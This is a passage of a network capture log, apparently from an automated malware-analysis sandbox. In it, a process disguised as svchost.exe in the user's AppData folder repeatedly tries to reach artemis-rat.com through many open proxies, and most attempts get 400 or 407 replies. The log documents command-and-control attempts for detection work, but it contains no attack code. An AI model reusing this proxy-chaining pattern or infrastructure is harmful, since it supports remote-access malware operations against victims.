Mar 9, 2024 13:14:28.718097925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.872653961 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2073	192.168.2.5	56485	184.170.248.5	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.719377995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2074	192.168.2.5	56571	104.20.67.113	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.720464945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.874823093 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2075	192.168.2.5	56517	38.162.15.98	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.720684052 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.150094032 CET	111	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="" Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 Data Ascii: Proxy Authentication Required

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2076	192.168.2.5	56586	104.21.223.181	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.720885992 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.874937057 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2077	192.168.2.5	56581	104.19.79.238	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.720912933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.874986887 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2078	192.168.2.5	56448	43.163.192.3	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.739362955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2079	192.168.2.5	56605	104.23.125.117	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.740045071 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.894550085 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2080	192.168.2.5	56593	162.159.241.5	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.740107059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.901608944 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2081	192.168.2.5	55822	142.54.239.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.740334034 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2082	192.168.2.5	55462	107.180.103.214	61634	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.741110086 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.880338907 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.880873919 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2083	192.168.2.5	56360	154.85.125.235	6446	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.741112947 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.114983082 CET	459	IN	HTTP/1.1 407 Proxy Authentication Required Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization." Proxy-Connection: close X-Webshare-Error: 407 X-Webshare-Reason: invalidpassword Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Length: 121 Content-Type: text/plain; charset=utf-8 Connection: close Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2084	192.168.2.5	56387	125.94.219.96	9091	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.748940945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.105252981 CET	325	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.1 Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2085	192.168.2.5	56635	185.162.228.154	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.753206968 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.907618046 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2086	192.168.2.5	56519	184.170.245.148	4145	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.753207922 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2087	192.168.2.5	56652	172.67.181.11	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.774467945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.928745985 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2088	192.168.2.5	56666	104.20.56.71	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.775298119 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.929900885 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2089	192.168.2.5	55371	91.134.140.160	57320	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.775546074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.208085060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.646426916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646327972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.443057060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.942904949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2090	192.168.2.5	56438	220.248.70.237	9002	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.775547981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.102102995 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2091	192.168.2.5	56646	104.16.143.127	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.775659084 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.930010080 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2092	192.168.2.5	56651	104.25.231.184	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.775665998 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.930118084 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2093	192.168.2.5	56648	172.67.181.149	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.775731087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
